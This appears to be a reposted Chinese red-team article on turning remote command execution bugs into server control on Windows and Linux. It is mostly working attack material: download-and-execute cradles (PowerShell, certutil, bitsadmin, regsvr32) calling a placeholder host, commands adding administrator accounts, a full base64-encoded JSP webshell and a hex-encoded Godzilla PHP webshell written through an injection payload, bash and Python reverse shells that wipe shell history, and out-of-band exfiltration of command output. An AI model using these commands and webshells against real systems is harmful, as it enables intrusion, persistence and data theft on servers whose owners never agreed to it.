[转载]远程命令执行类漏洞传输Webshell或文件等多种方案

[转载]远程命令执行类漏洞传输Webshell或文件等多种方案

Scroll Down

本文由 简悦 SimpRead 转码, 原文地址 xiashang.xyz

在红蓝对抗中,远程命令执行类漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种 JAVA 反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL 注入漏洞等。远程命令执行类漏洞从漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。

从大方向上看,远程命令执行类漏洞在漏洞利用阶段关注的问题主要是三个:目标操作系统类型、执行命令结果是否有回显以及是否能通外网。针对不同的操作系统,执行命令各有差异。另外,目标是否有回显是漏洞利用的难易程度的关键因素之一,一般来说,可以回显的漏洞要比无回显的漏洞利用要容易得多 (当然也可以通过其他方法让原本无回显的漏洞得到回显,这里先不讨论这种情况)。最后目标是否能通外网也是直接影响漏洞利用的关键因素,如果漏洞无回显并且也不通外网,那漏洞利用可的难度就大大增加了。从更加细节的角度去考虑,针对不同的漏洞,不同的环境,需要考虑的额外因素就更多了。比如操作系统是否存在或者可以执行某个命令、目标是否安装杀软、命令中的特殊符号等问题。以下就远程命令执行漏洞的利用技巧做一个简单的总结。

Windows

场景一

是否有回显:是
是否通外网:是

解决思路:
有回显也可以通外网的场景是最简单,获取权限的方法也是多样的,以下主要简单总结一些常见的方法或思路

方法一:确认 Web 应用物理路径,然后写入 webshell (参考场景二)

方法二:远程下载并执行
a)powershell

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/p'))"

b)certutil

certutil -urlcache -split -f http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe

c)bitsadmin

bitsadmin /transfer n http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe

d)regsvr32

regsvr32 /s /n /u /i:http://x.x.x.x/r scrobj.dll

方法三:如果目标开放远程桌面端口的话,并且权限足够可以直接执行命令添加账号 (内网比较常见)

net user test test@123qaz /add
net localgroup administrators test /add
或者启用guest账号:
net user guest /active:yes
net user guest guest@123qaz
net localgroup administrators guest /add

场景二

是否有回显:是
是否通外网:否

解决思路:针对这种场景,解决方法就比较灵活了。因为不通外网,所以主思路还是想办法写入 webshell。

  1. 确认 Web 应用物理路径
dir /s/a-d/b /WEB-INF/web.xml
或者
for /r c:\ %i in (checkCode.js*) do @echo %i
  1. 写入 webshell,需要考虑 webshell 特殊符号问题,可以先做 base64 编码写入
echo -----BEGIN CERTIFICATE----- >D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt&&echo PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKixqYXZhLnV0aWwuKixqYXZhLm5ldC4qLGphdmEuc3FsLiosamF2YS50ZXh0LioiJT48JSFTdHJpbmcgUHdkPSIxMTAiO1N0cmluZyBjcz0iVVRGLTgiO1N0cmluZyBFQyhTdHJpbmcgcyl0aHJvd3MgRXhjZXB0aW9ue3JldHVybiBuZXcgU3RyaW5nKHMuZ2V0Qnl0ZXMoIklTTy04ODU5LTEiKSxjcyk7fUNvbm5lY3Rpb24gR0MoU3RyaW5nIHMpdGhyb3dzIEV4Y2VwdGlvbntTdHJpbmdbXSB4PXMudHJpbSgpLnNwbGl0KCJcclxuIik7Q2xhc3MuZm9yTmFtZSh4WzBdLnRyaW0oKSk7aWYoeFsxXS5pbmRleE9mKCJqZGJjOm9yYWNsZSIpIT0tMSl7cmV0dXJuIERyaXZlck1hbmFnZXIuZ2V0Q29ubmVjdGlvbih4WzFdLnRyaW0oKSsiOiIreFs0XSx4WzJdLmVxdWFsc0lnbm9yZUNhc2UoIlsvbnVsbF0iKT8iIjp4WzJdLHhbM10uZXF1YWxzSWdub3JlQ2FzZSgiWy9udWxsXSIpPyIiOnhbM10pO31lbHNle0Nvbm5lY3Rpb24gYz1Ecml2ZXJNYW5hZ2VyLmdldENvbm5lY3Rpb24oeFsxXS50cmltKCkseFsyXS5lcXVhbHNJZ25vcmVDYXNlKCJbL251bGxdIik/IiI6eFsyXSx4WzNdLmVxdWFsc0lnbm9yZUNhc2UoIlsvbnVsbF0iKT8iIjp4WzNdKTtpZih4Lmxlbmd0aD40KXtjLnNldENhdGFsb2coeFs0XSk7fXJldHVybiBjO319dm9pZCBBQShTdHJpbmdCdWZmZXIgc2IpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIHJbXT1GaWxlLmxpc3RSb290cygpO2ZvcihpbnQgaT0wO2k8ci5sZW5ndGg7aSsrKXtzYi5hcHBlbmQocltpXS50b1N0cmluZygpLnN1YnN0cmluZygwLDIpKTt9fXZvaWQgQkIoU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257RmlsZSBvRj1uZXcgRmlsZShzKSxsW109b0YubGlzdEZpbGVzKCk7U3RyaW5nIHNULHNRLHNGPSIiO2phdmEudXRpbC5EYXRlIGR0O1NpbXBsZURhdGVGb3JtYXQgZm09bmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eXktTU0tZGQgSEg6bW06c3MiKTtmb3IoaW50IGk9MDsgaTxsLmxlbmd0aDsgaSsrKXtkdD1uZXcgamF2YS51dGlsLkRhdGUobFtpXS5sYXN0TW9kaWZpZWQoKSk7c1Q9Zm0uZm9ybWF0KGR0KTtzUT1sW2ldLmNhblJlYWQoKT8iUiI6IiI7c1EgKz1sW2ldLmNhbldyaXRlKCk/IiBXIjoiIjtpZihsW2ldLmlzRGlyZWN0b3J5KCkpe3NiLmFwcGVuZChsW2ldLmdldE5hbWUoKSsiL1x0IitzVCsiXHQiK2xbaV0ubGVuZ3RoKCkrIlx0IitzUSsiXG4iKTt9ZWxzZXtzRis9bFtpXS5nZXROYW1lKCkrIlx0IitzVCsiXHQiK2xbaV0ubGVuZ3RoKCkrIlx0IitzUSsiXG4iO319c2IuYXBwZW5kKHNGKTt9dm9pZCBFRShTdHJpbmcgcyl0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgZj1uZXcgRmlsZShzKTtpZihmLmlzRGlyZWN0b3J5KCkpe0ZpbGUgeFtdPWYubGlzdEZpbGVzKCk7Zm9yKGludCBrPTA7IGsgPCB4Lmxlbmd0aDsgaysrKXtpZigheFtrXS5kZWxldGUoKSl7RUUoeFtrXS5nZXRQYXRoKCkpO319fWYuZGVsZXRlKCk7fXZvaWQgRkYoU3RyaW5nIHMsSHR0cFNlcnZsZXRSZXNwb25zZSByKXRocm93cyBFeGNlcHRpb257aW50IG47Ynl0ZVtdIGI9bmV3IGJ5dGVbNTEyXTtyLnJlc2V0KCk7U2VydmxldE91dHB1dFN0cmVhbSBvcz1yLmdldE91dHB1dFN0cmVhbSgpO0J1ZmZlcmVkSW5wdXRTdHJlYW0gaXM9bmV3IEJ1ZmZlcmVkSW5wdXRTdHJlYW0obmV3IEZpbGVJbnB1dFN0cmVhbShzKSk7b3Mud3JpdGUoKCItPiIrInwiKS5nZXRCeXRlcygpLDAsMyk7d2hpbGUoKG49aXMucmVhZChiLDAsNTEyKSkhPS0xKXtvcy53cml0ZShiLDAsbik7fW9zLndyaXRlKCgifCIrIjwtIikuZ2V0Qnl0ZXMoKSwwLDMpO29zLmNsb3NlKCk7aXMuY2xvc2UoKTt9dm9pZCBHRyhTdHJpbmcgcyxTdHJpbmcgZCl0aHJvd3MgRXhjZXB0aW9ue1N0cmluZyBoPSIwMTIzNDU2Nzg5QUJDREVGIjtGaWxlIGY9bmV3IEZpbGUocyk7Zi5jcmVhdGVOZXdGaWxlKCk7RmlsZU91dHB1dFN0cmVhbSBvcz1uZXcgRmlsZU91dHB1dFN0cmVhbShmKTtmb3IoaW50IGk9MDsgaTxkLmxlbmd0aCgpO2krPTIpe29zLndyaXRlKChoLmluZGV4T2YoZC5jaGFyQXQoaSkpIDw8IDQgfCBoLmluZGV4T2YoZC5jaGFyQXQoaSsxKSkpKTt9b3MuY2xvc2UoKTt9dm9pZCBISChTdHJpbmcgcyxTdHJpbmcgZCl0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgc2Y9bmV3IEZpbGUocyksZGY9bmV3IEZpbGUoZCk7aWYoc2YuaXNEaXJlY3RvcnkoKSl7aWYoIWRmLmV4aXN0cygpKXtkZi5ta2RpcigpO31GaWxlIHpbXT1zZi5saXN0RmlsZXMoKTtmb3IoaW50IGo9MDsgajx6Lmxlbmd0aDsgaisrKXtISChzKyIvIit6W2pdLmdldE5hbWUoKSxkKyIvIit6W2pdLmdldE5hbWUoKSk7fX1lbHNle0ZpbGVJbnB1dFN0cmVhbSBpcz1uZXcgRmlsZUlucHV0U3RyZWFtKHNmKTtGaWxlT3V0cHV0U3RyZWFtIG9zPW5ldyBGaWxlT3V0cHV0U3RyZWFtKGRmKTtpbnQgbjtieXRlW10gYj1uZXcgYnl0ZVs1MTJdO3doaWxlKChuPWlzLnJlYWQoYiwwLDUxMikpIT0tMSl7b3Mud3JpdGUoYiwwLG4pO31pcy5jbG9zZSgpO29zLmNsb3NlKCk7fX12b2lkIElJKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257RmlsZSBzZj1uZXcgRmlsZShzKSxkZj1uZXcgRmlsZShkKTtzZi5yZW5hbWVUbyhkZik7fXZvaWQgSkooU3RyaW5nIHMpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIGY9bmV3IEZpbGUocyk7Zi5ta2RpcigpO312b2lkIEtLKFN0cmluZyBzLFN0cmluZyB0KXRocm93cyBFeGNlcHRpb257RmlsZSBmPW5ldyBGaWxlKHMpO1NpbXBsZURhdGVGb3JtYXQgZm09bmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eXktTU0tZGQgSEg6bW06c3MiKTtqYXZhLnV0aWwuRGF0ZSBkdD1mbS5wYXJzZSh0KTtmLnNldExhc3RNb2RpZmllZChkdC5nZXRUaW1lKCkpO312b2lkIExMKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257VVJMIHU9bmV3IFVSTChzKTtpbnQgbj0wO0ZpbGVPdXRwdXRTdHJlYW0gb3M9bmV3IEZpbGVPdXRwdXRTdHJlYW0oZCk7SHR0cFVSTENvbm5lY3Rpb24gaD0oSHR0cFVSTENvbm5lY3Rpb24pIHUub3BlbkNvbm5lY3Rpb24oKTtJbnB1dFN0cmVhbSBpcz1oLmdldElucHV0U3RyZWFtKCk7Ynl0ZVtdIGI9bmV3IGJ5dGVbNTEyXTt3aGlsZSgobj1pcy5yZWFkKGIpKSE9LTEpe29zLndyaXRlKGIsMCxuKTt9b3MuY2xvc2UoKTtpcy5jbG9zZSgpO2guZGlzY29ubmVjdCgpO312b2lkIE1NKElucHV0U3RyZWFtIGlzLFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue1N0cmluZyBsO0J1ZmZlcmVkUmVhZGVyIGJyPW5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIoaXMpKTt3aGlsZSgobD1ici5yZWFkTGluZSgpKSE9bnVsbCl7c2IuYXBwZW5kKGwrIlxyXG4iKTt9fXZvaWQgTk4oU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257Q29ubmVjdGlvbiBjPUdDKHMpO1Jlc3VsdFNldCByPXMuaW5kZXhPZigiamRiYzpvcmFjbGUiKSE9LTE/Yy5nZXRNZXRhRGF0YSgpLmdldFNjaGVtYXMoKTpjLmdldE1ldGFEYXRhKCkuZ2V0Q2F0YWxvZ3MoKTt3aGlsZShyLm5leHQoKSl7c2IuYXBwZW5kKHIuZ2V0U3RyaW5nKDEpKyJcdCIpO31yLmNsb3NlKCk7Yy5jbG9zZSgpO312b2lkIE9PKFN0cmluZyBzLFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue0Nvbm5lY3Rpb24gYz1HQyhzKTtTdHJpbmdbXSB4PXMudHJpbSgpLnNwbGl0KCJcclxuIik7UmVzdWx0U2V0IHI9Yy5nZXRNZXRhRGF0YSgpLmdldFRhYmxlcyhudWxsLHMuaW5kZXhPZigiamRiYzpvcmFjbGUiKSE9LTE/eC5sZW5ndGg+NT94WzVdOnhbNF06bnVsbCwiJSIsbmV3IFN0cmluZ1tdeyJUQUJMRSJ9KTt3aGlsZShyLm5leHQoKSl7c2IuYXBwZW5kKHIuZ2V0U3RyaW5nKCJUQUJMRV9OQU1FIikrIlx0Iik7fXIuY2xvc2UoKTtjLmNsb3NlKCk7fXZvaWQgUFAoU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257U3RyaW5nW10geD1zLnRyaW0oKS5zcGxpdCgiXHJcbiIpO0Nvbm5lY3Rpb24gYz1HQyhzKTtTdGF0ZW1lbnQgbT1jLmNyZWF0ZVN0YXRlbWVudCgxMDA1LDEwMDcpO1Jlc3VsdFNldCByPW0uZXhlY3V0ZVF1ZXJ5KCJzZWxlY3QgKiBmcm9tICIreFt4Lmxlbmd0aC0xXSk7UmVzdWx0U2V0TWV0YURhdGEgZD1yLmdldE1ldGFEYXRhKCk7Zm9yKGludCBpPTE7aTw9ZC5nZXRDb2x1bW5Db3VudCgpO2krKyl7c2IuYXBwZW5kKGQuZ2V0Q29sdW1uTmFtZShpKSsiICgiK2QuZ2V0Q29sdW1uVHlwZU5hbWUoaSkrIilcdCIpO31yLmNsb3NlKCk7bS5jbG9zZSgpO2MuY2xvc2UoKTt9dm9pZCBRUShTdHJpbmcgY3MsU3RyaW5nIHMsU3RyaW5nIHEsU3RyaW5nQnVmZmVyIHNiLFN0cmluZyBwKXRocm93cyBFeGNlcHRpb257Q29ubmVjdGlvbiBjPUdDKHMpO1N0YXRlbWVudCBtPWMuY3JlYXRlU3RhdGVtZW50KDEwMDUsMTAwOCk7QnVmZmVyZWRXcml0ZXIgYnc9bnVsbDt0cnl7UmVzdWx0U2V0IHI9bS5leGVjdXRlUXVlcnkocS5pbmRleE9mKCItLWY6IikhPS0xP3Euc3Vic3RyaW5nKDAscS5pbmRleE9mKCItLWY6IikpOnEpO1Jlc3VsdFNldE1ldGFEYXRhIGQ9ci5nZXRNZXRhRGF0YSgpO2ludCBuPWQuZ2V0Q29sdW1uQ291bnQoKTtmb3IoaW50IGk9MTsgaSA8PW47IGkrKyl7c2IuYXBwZW5kKGQuZ2V0Q29sdW1uTmFtZShpKSsiXHR8XHQiKTt9c2IuYXBwZW5kKCJcclxuIik7aWYocS5pbmRleE9mKCItLWY6IikhPS0xKXtGaWxlIGZpbGU9bmV3IEZpbGUocCk7aWYocS5pbmRleE9mKCItdG86Iik9PS0xKXtmaWxlLm1rZGlyKCk7fWJ3PW5ldyBCdWZmZXJlZFdyaXRlcihuZXcgT3V0cHV0U3RyZWFtV3JpdGVyKG5ldyBGaWxlT3V0cHV0U3RyZWFtKG5ldyBGaWxlKHEuaW5kZXhPZigiLXRvOiIpIT0tMT9wLnRyaW0oKTpwK3Euc3Vic3RyaW5nKHEuaW5kZXhPZigiLS1mOiIpKzQscS5sZW5ndGgoKSkudHJpbSgpKSx0cnVlKSxjcykpO313aGlsZShyLm5leHQoKSl7Zm9yKGludCBpPTE7IGk8PW47aSsrKXtpZihxLmluZGV4T2YoIi0tZjoiKSE9LTEpe2J3LndyaXRlKHIuZ2V0T2JqZWN0KGkpKyIiKyJcdCIpO2J3LmZsdXNoKCk7fWVsc2V7c2IuYXBwZW5kKHIuZ2V0T2JqZWN0KGkpKyIiKyJcdHxcdCIpO319aWYoYnchPW51bGwpe2J3Lm5ld0xpbmUoKTt9c2IuYXBwZW5kKCJcclxuIik7fXIuY2xvc2UoKTtpZihidyE9bnVsbCl7YncuY2xvc2UoKTt9fWNhdGNoKEV4Y2VwdGlvbiBlKXtzYi5hcHBlbmQoIlJlc3VsdFx0fFx0XHJcbiIpO3RyeXttLmV4ZWN1dGVVcGRhdGUocSk7c2IuYXBwZW5kKCJFeGVjdXRlIFN1Y2Nlc3NmdWxseSFcdHxcdFxyXG4iKTt9Y2F0Y2goRXhjZXB0aW9uIGVlKXtzYi5hcHBlbmQoZWUudG9TdHJpbmcoKSsiXHR8XHRcclxuIik7fX1tLmNsb3NlKCk7Yy5jbG9zZSgpO30lPjwlY3M9cmVxdWVzdC5nZXRQYXJhbWV0ZXIoInowIikhPW51bGw/cmVxdWVzdC5nZXRQYXJhbWV0ZXIoInowIikrIiI6Y3M7cmVzcG9uc2Uuc2V0Q29udGVudFR5cGUoInRleHQvaHRtbCIpO3Jlc3BvbnNlLnNldENoYXJhY3RlckVuY29kaW5nKGNzKTtTdHJpbmdCdWZmZXIgc2I9bmV3IFN0cmluZ0J1ZmZlcigiIik7dHJ5e1N0cmluZyBaPUVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKFB3ZCkrIiIpO1N0cmluZyB6MT1FQyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiejEiKSsiIik7U3RyaW5nIHoyPUVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MiIpKyIiKTtzYi5hcHBlbmQoIi0+IisifCIpO1N0cmluZyBzPXJlcXVlc3QuZ2V0U2Vzc2lvbigpLmdldFNlcnZsZXRDb250ZXh0KCkuZ2V0UmVhbFBhdGgoIi8iKTtpZihaLmVxdWFscygiQSIpKXtzYi5hcHBlbmQocysiXHQiKTtpZighcy5zdWJzdHJpbmcoMCwxKS5lcXVhbHMoIi8iKSl7QUEoc2IpO319ZWxzZSBpZihaLmVxdWFscygiQiIpKXtCQih6MSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIkMiKSl7U3RyaW5nIGw9IiI7QnVmZmVyZWRSZWFkZXIgYnI9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihuZXcgRmlsZUlucHV0U3RyZWFtKG5ldyBGaWxlKHoxKSkpKTt3aGlsZSgobD1ici5yZWFkTGluZSgpKSE9bnVsbCl7c2IuYXBwZW5kKGwrIlxyXG4iKTt9YnIuY2xvc2UoKTt9ZWxzZSBpZihaLmVxdWFscygiRCIpKXtCdWZmZXJlZFdyaXRlciBidz1uZXcgQnVmZmVyZWRXcml0ZXIobmV3IE91dHB1dFN0cmVhbVdyaXRlcihuZXcgRmlsZU91dHB1dFN0cmVhbShuZXcgRmlsZSh6MSkpKSk7Yncud3JpdGUoejIpO2J3LmNsb3NlKCk7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIkUiKSl7RUUoejEpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJGIikpe0ZGKHoxLHJlc3BvbnNlKTt9ZWxzZSBpZihaLmVxdWFscygiRyIpKXtHRyh6MSx6Mik7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIkgiKSl7SEgoejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJJIikpe0lJKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiSiIpKXtKSih6MSk7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIksiKSl7S0soejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJMIikpe0xMKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiTSIpKXtTdHJpbmdbXSBjPXt6MS5zdWJzdHJpbmcoMiksejEuc3Vic3RyaW5nKDAsMiksejJ9O1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO01NKHAuZ2V0SW5wdXRTdHJlYW0oKSxzYik7TU0ocC5nZXRFcnJvclN0cmVhbSgpLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiTiIpKXtOTih6MSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIk8iKSl7T08oejEsc2IpO31lbHNlIGlmKFouZXF1YWxzKCJQIikpe1BQKHoxLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiUSIpKXtRUShjcyx6MSx6MixzYix6Mi5pbmRleE9mKCItdG86IikhPS0xP3oyLnN1YnN0cmluZyh6Mi5pbmRleE9mKCItdG86IikrNCx6Mi5sZW5ndGgoKSk6cy5yZXBsYWNlQWxsKCJcXFxcIiwiLyIpKyJpbWFnZXMvIik7fX1jYXRjaChFeGNlcHRpb24gZSl7c2IuYXBwZW5kKCJFUlJPUiIrIjovLyAiK2UudG9TdHJpbmcoKSk7fXNiLmFwcGVuZCgifCIrIjwtIik7b3V0LnByaW50KHNiLnRvU3RyaW5nKCkpOyU+ >>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt&&echo -----END CERTIFICATE----- >>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt
  1. 使用 certutil 解码
certutil -decode D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.jsp

场景三

是否有回显:否
是否通外网:是

解决思路:
方法一:远程下载并执行(参考场景一方法二)

方法二:OOB

for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i  #执行whoami命令并将结果发送至DNSLog
for /r c:\ %i in (checkCode.js*) do certutil -urlcache -split -f http://x.x.x.x/%i  #寻找Web应用路径并将结果发送至DNSLog

场景四

是否有回显:否
是否通外网:否

解决思路:直接盲打

  1. 直接盲打,定位 Web 路径并写入结果文件
for /r C:\ %i in (test.css*) do whoami > %i/../test.txt

或者

cmd /c "for /f %i in ('dir /s /b d:a.php') do (echo %i> %i.path.txt)&(ipconfig > %i.ipconfig.txt)"

Linux

场景一

是否有回显:是
是否通外网:是

解决思路:最简单的场景,方法很多
方法一:确认 Web 应用物理路径,然后写入 webshell

  1. 执行 pwd、ls 等命令确认一下 Web 路径在哪里
  2. 写入 webshell
echo webshell的base64编码内容 |base64 -d > Web应用目录/test.jsp  #echo命令直接写入webshell

Weblogic的情况

find / -type d -name bea_wls_internal|while read f;do find $f -type d -name war;done|while read ff;do echo $ff >$ff/sectest.txt;done

方法二:反弹 shell, 方法很多, 不一一列出
a)bash

bash -i >& /dev/tcp/ip/port 0>&1
或者
exec 5<>/dev/tcp/ip/port;cat <&5|while read line;do $line >&5 2>&1;done

b)python
1.wget 或 curl 下载 python 反弹脚本,然后执行

wget -O /tmp/test.py http://x.x.x.x/test.py

2.python 反弹脚本

import sys,os,socket,pty
shell = "/bin/sh"
def usage(name):
    print 'python reverse connector'
    print 'usage: %s <ip_addr> <port>' % name

def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print 'connect ok'
    except:
        print 'connect faild'
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",'/dev/null')
    os.putenv("HISTSIZE",'0')
    os.putenv("HISTFILESIZE",'0')
    pty.spawn(shell)
    s.close()

if __name__ == '__main__':
    main()

场景二

是否有回显:是
是否通外网:否

解决思路:针对这种场景,解决方法就比较灵活了。因为不通外网,所以主思路还是想办法写入 webshell。参考场景一方法一。

场景三

是否有回显:否
是否通外网:是

解决思路:
方法一:直接反弹 shell, 参考场景一方法二

方法二:OOB

  1. 定位 Web 应用目录
wget http://x.x.x.x/`pwd|base64`  #大致确认一下当前目录,再通过ls、cd等命令获取Web应用目录,并发送结果至DNSLog
  1. 写入 webshell
echo webshell的base64编码内容 |base64 -d > Web应用目录/test.jsp  #echo命令直接写入webshell

场景四

是否有回显:否
是否通外网:否

解决思路:最艰难的情况,直接盲打

  1. 直接盲打,定位 Web 路径并写入结果文件
find /|grep check.js|while read f;do sh -c "whoami" >$(dirname $f)/test.txt;done

Certutil编码上传Webshell

将“哥斯拉”的PHP木马在进行一次HEX或多次编码,然后将编码后的内容用set命令写入,最后再用certutil命令的decodehex参数将其解码并写入到shell.php文件即可。

写入

 _method=__construct&filter=system&a=cmd.exe /c set /p="3C3F7068700A2020202073657373696F6E5F737461727428293B0A20202020407365745F74696D655F6C696D69742830293B0A09406572726F725F7265706F7274696E672830293B0A2020202066756E6374696F6E20452824442C244B297B0A2020202020202020666F722824693D303B24693C7374726C656E282444293B24692B2B29207B0A20202020202020202020202024445B24695D203D2024445B24695D5E244B5B24692B312631355D3B0A20202020202020207D0A202020202020202072657475726E2024443B0A202020207D0A2020202066756E6374696F6E2051282444297B0A202020202020202072657475726E206261736536345F656E636F6465282444293B0A202020207D0A2020202066756E6374696F6E204F282444297B0A202020202020202072657475726E206261736536345F6465636F6465282444293B0A202020207D0A2020202024503D2770617373273B0A2020202024563D277061796C6F6164273B0A2020202024543D2733633665306238613963313532323461273B0A2020202069662028697373657428245F504F53545B24505D29297B0A202020202020202024463D4F2845284F28245F504F53545B24505D292C245429293B0A202020202020202069662028697373657428245F53455353494F4E5B24565D29297B0A202020202020202020202020244C3D245F53455353494F4E5B24565D3B0A20202020202020202020202024413D6578706C6F646528277C272C244C293B0A202020202020202020202020636C61737320437B7075626C69632066756E6374696F6E206E766F6B6528247029207B6576616C2824702E2222293B7D7D0A20202020202020202020202024523D6E6577204328293B0A09090924522D3E6E766F6B652824415B305D293B0A2020202020202020202020206563686F20737562737472286D64352824502E2454292C302C3136293B0A2020202020202020202020206563686F20512845284072756E282446292C245429293B0A2020202020202020202020206563686F20737562737472286D64352824502E2454292C3136293B0A20202020202020207D656C73657B0A202020202020202020202020245F53455353494F4E5B24565D3D24463B0A20202020202020207D0A202020207D" > E:\phpstudys\PHPTutorial\WWW\bm\public\static\hex.txt 

还原

_method=__construct&filter=system&a=cmd.exe /c certutil -decodehex E:\phpstudys\PHPTutorial\WWW\bm\public\static\hex.txt E:\phpstudys\PHPTutorial\WWW\bm\public\static\shell.php 

Tips-2

平常渗透过程中,我们可能利用远程命令执行漏洞反弹了一个shell回来,但是为了方便操作我们可能需要写一个webshell到目标服务器,但是如何才能在一个系统里边快速的定位到网站的绝对路径呢,如何才能在标准化系统中通过一条命令快速实现这一点呢?我不知道小伙伴们通常用什么样的方法,这里给大家介绍几种方法。

方法一 :打开web查看源码,复制一个特征字符串,然后替换进下面命令的htmlString搜索之。

Win :findstr /s/i/n /d:E:\code\xampp\htdocs\ /c:”htmlString” .
Linux:find / -name “.” | xargs grep”htmlString”
方法二 :对于linux系统,我们也可以尝试通过history命令去查找,同样的也可以去看.bash_history

history | grep -E ‘cd|vi|ed|nano|et|mkdir|rm|find|ls|mv’ |grep -v grep | grep -E ‘www|html|nginx|apache|php|lighttp|web’ -i

方法三 :windows系统中也可以使用dir去匹配一个特征文件名

dir /s/a-d/b E:\code\xampp\htdocs*重复度较低的文件名(支持通配符)

Tips-3

https://xz.aliyun.com/t/2741